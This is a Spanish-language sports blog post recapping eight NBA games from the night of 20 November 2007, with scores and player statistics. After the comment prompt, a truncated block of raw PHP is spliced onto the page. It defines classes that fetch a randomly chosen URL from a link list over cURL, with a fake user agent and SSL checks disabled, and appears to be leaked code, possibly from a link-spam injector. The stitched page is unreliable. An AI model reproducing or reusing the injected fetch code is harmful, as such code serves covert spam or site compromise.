La crónica (20/11/07)

21 de November de 2007 por MagicJohnson32

Noche de muchas victorias visitantes y de confirmaciones. Se confirmó que Chicago no levanta cabeza y que los fans de los Knicks están hartos tras siete derrotas consecutivas. ¿Cuánto le queda a Isiah Thomas como técnico de NYK? En lo positivo, se confirman las buenas rachas de Suns (seis seguidas), Nuggets (también seis) Wizards (cinco), Lakers (cuatro), Mavs (cuatro), Bucks (tres) y Warriors (tres). Tras los resultados de anoche, sólo cinco equipos del Este tienen un récord positivo, por los nueve que hay en el Oeste con más victorias que derrotas.

 

Vamos con una crónica más detallada de los ocho encuentros disputados la pasada madrugada en la NBA:


Sixers 101 – Wizards 116

Ni la baja de Arenas ni el discreto partido de Caron Butler ni la brillante actuación de Louis Williams evitaron que la visita de los Sixers a la capital se resolviese de forma contundente a favor de los Wizards. Lo más destacado fue el partido de Blatche, autor de 26 puntos con 12 de 14 en tiros, además de 8 rebotes y 4 asistencias. Stevenson y Jamison aportaron 19 cada uno, Daniels suplió a Arenas con 15-8-6 y Songaila y Nick Young anotaron en dobles figuras saliendo desde el banquillo. Por los Sixers, los únicos que cumplieron fueron Williams, con 10 de 13 en tiros, 4 de 4 en triples, para 25 puntos, y Thadeus Young, que hizo 7 de 10 lanzamientos y 14 puntos. Tras su desastroso inicio de temporada, los Wizards ya se encuentran al 50% de victorias con 5-5.

Spurs 95 – Hawks 83

Partido completamente previsible el que disputaron Spurs y Hawks anoche en el Philips Arena de Atlanta. Los texanos impusieron la lógica de la mano de Tony Parker (31 puntos y 9 asistencias) y necesitaron poca cosa más que los 19 puntos de Ginóbili para ganar a medio gas. Por el equipo de Georgia no fueron suficientes las aportaciones de Joe Johnson (20 puntos), Marvin Williams (16-6) y Horford (11-8). El desastroso partido de Josh Smith, con 3 de 16 en tiros y 5 pérdidas, no ayudó mucho. Los Spurs se permitieron relajarse en el último cuarto, en el que sólo anotaron 12 puntos.

lebronshoutBucks 111 – Cavs 107

18 puntos de Michael Redd en el tercer cuarto impulsaron a los Bucks a una victoria en Cleveland en un partido que en su arranque parecía decantarse del lado local. Los Cavs ganaban por 14 puntos durante la primera mitad pero los de Milwaukee reaccionaron para irse al descanso 4 abajo y ponerse por delante durante la segunda parte. LeBron James volvió a brillar, esta vez con 34 puntos, 7 rebotes y 7 asistencias, y poco le faltó para igualar una diferencia de 9 puntos a falta de 2 minutos. Finalmente Redd, que logró 34-7-6, aseguró el triunfo de su equipo. Mo Williams, con 20-9-6, y Charlie Villanueva, con 17-9, también destacaron en los Bucks, mientras que Gibson logró su mejor marca en temporada regular con 26 puntos (5 triples) e Ilgauskas sumó 16 puntos y 12 rebotes para unos Cavs que no pudieron contar con Hughes ni Marshall.

Lakers 134 – Pacers 114

En una noche que se abrió con el anuncio del traspaso de Evans y Cook a Orlando a cambio de Trevor Ariza, el resto de los Lakers ofreció lo mejor de sí. Liderados por Bryant, los angelinos obtuvieron la mejor marca anotadora de la temporada con una aplastante victoria en el Conseco Fieldhouse y otros siete jugadores más en dobles figuras en anotación. Brillaron especialmente Farmar y Bynum, quien, en su primera titularidad de la campaña, dominó a Jermaine O’Neal con 6 de 6 en tiros, 10 rebotes y 4 tapones. Los Lakers lograron 13 de 25 triples, con 5 de Kobe y 3 de Radmanovic, y anotaron un 58,3% de sus tiros de campo. Para los Pacers, que lanzaron 103 tiros de campo, el mejor fue Williams, que logró su mejor marca con 24 puntos. Granger hizo 17-6 y Tinsley 10-10, pero la defensa de equipo dejó mucho que desear y los de Indianapolis encajaron 30 o más puntos en cada uno de los cuatro cuartos. Es la cuarta victoria seguida de los Lakers (7-3).

Warriors 108 – Knicks 82

Partido con poquita historia. Los Knicks siguen su caída libre y acumulan su séptima derrota consecutiva a pesar de la vuelta de Marbury, que, además, hizo un buen partido. Mientras, los Warriors son todo lo contrario. Empezaron con 6 derrotas y ahora llevan ya tres victorias consecutivas. Parece que la vuelta del capitán (Stephen Jackson) ha hecho resurgir a ese equipo que el año pasado eliminó a los grandes favoritos en los Playoffs. 23 puntos, 6 rebotes y 7 asistencias de Jackson, 31 puntos y otros 6 rebotes y 7 asistencias de Baron Davis, y los 16 de Pietrus desde el banquillo fueron prácticamente suficientes para derrotar a los Knicks, que sólo anotaron 82, con 18 de Marbury, los 15 y 16 rebotes de Zach (su séptimo doble-doble consecutivo) y los 15 y 10 de Quentin. Isiah tiene las horas contadas, o debería, pues el “Fire Isiah” se oye cada vez más y con mayor fuerza.

stephisiah

Raptors 99 – Mavericks 105

Una vez más, los Raptors se han dejado remontar por los Mavs. En esta ocasión no fue necesaria la prórroga. Tras ir ganando por 24 a falta de 5:58 para el descanso, aparecieron Devin Harris (19 puntos) y Dirk Nowitzki (32 puntos, incluidos cuatro triples consecutivos que dieron la ventaja a los Mavs). Harris se echó el equipo a la espalda para empezar a enjugar la desventaja y al descanso se llegó con sólo 14 de diferencia. Y siguió a la vuelta de vestuarios, esta vez ya con la ayuda del alemán, para terminar el tercer cuarto con ventaja para los texanos. Destacados por Toronto fueron Chris Bosh (31 puntos y 12 rebotes) y Andrea Bargnani (20 puntos con 5 de 9 en triples). Los españoles: Calderón, en su rol habitual (o algo más, pues TJ Ford se retiró lesionado), aportó 14 puntos y 6 asistencias, mientras que los médicos de Toronto han visto algo “inusual” en la pierna de Garbajosa, así que éste no jugó ni un minuto, esta vez con disculpa médica.

Bulls 91 – Nuggets 112

Los Bulls siguen siendo la sorpresa negativa del año. Ya están 2-8, y la cosa no parece tener visos de mejoría. Mientras, los Nuggets siguen en racha positiva. Seis victorias consecutivas y se ponen 8-3. Y es que este equipo, con un terrorífico poder anotador, ha aprendido a defender, que es lo que le faltaba para sumarse al carro de los favoritos. El partido tiene poco que comentar, en el tercer cuarto estaba más que decidido y el último cuarto se jugó con suplentes. Individualmente cabe destacar el buen partido del rookie Noah, 16 puntos 8 rebotes y 3 asistencias en 21 minutos de juego, y el pésimo 2 de 14 de Ben Gordon, el que se supone que debe llevar el peso anotador de los Bulls, más cuando Deng sigue sin jugar. Por los Nuggets, los de siempre: 22 y 6 asistencias de Iverson, 26 puntos de Carmelo y 12 puntos, 20 rebotes, 5 asistencias y 5 tapones de un Camby en plan emperador.

bullsbench

Suns 100 – Kings 98

A punto de dar la sorpresa los Kings. Salmons tuvo un último triple que taponó Amare (26 puntos 13 rebotes y 4 tapones), y antes Artest (33 puntos y 12 rebotes, pero 6 pérdidas) había tenido el tiro que empataría el partido. Los Suns consiguieron una buena ventaja al final del tercer cuarto, 12 puntos, pero los Kings se sobrepusieron y lograron empatar el partido a falta de tres minutos. Si bien los Suns destacan por su ofensiva, el partido de esta noche lo ganaron por su defensa: consiguieron anular a Kevin Martin, que, a pesar de sus 15 puntos, acabó con un 30% en tiros. Mal día en el tiro tuvieron también Nash (5 de 14) y Barbosa (2 de 8 en tiros de tres). Hoy en Phoenix será la revancha.

 

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>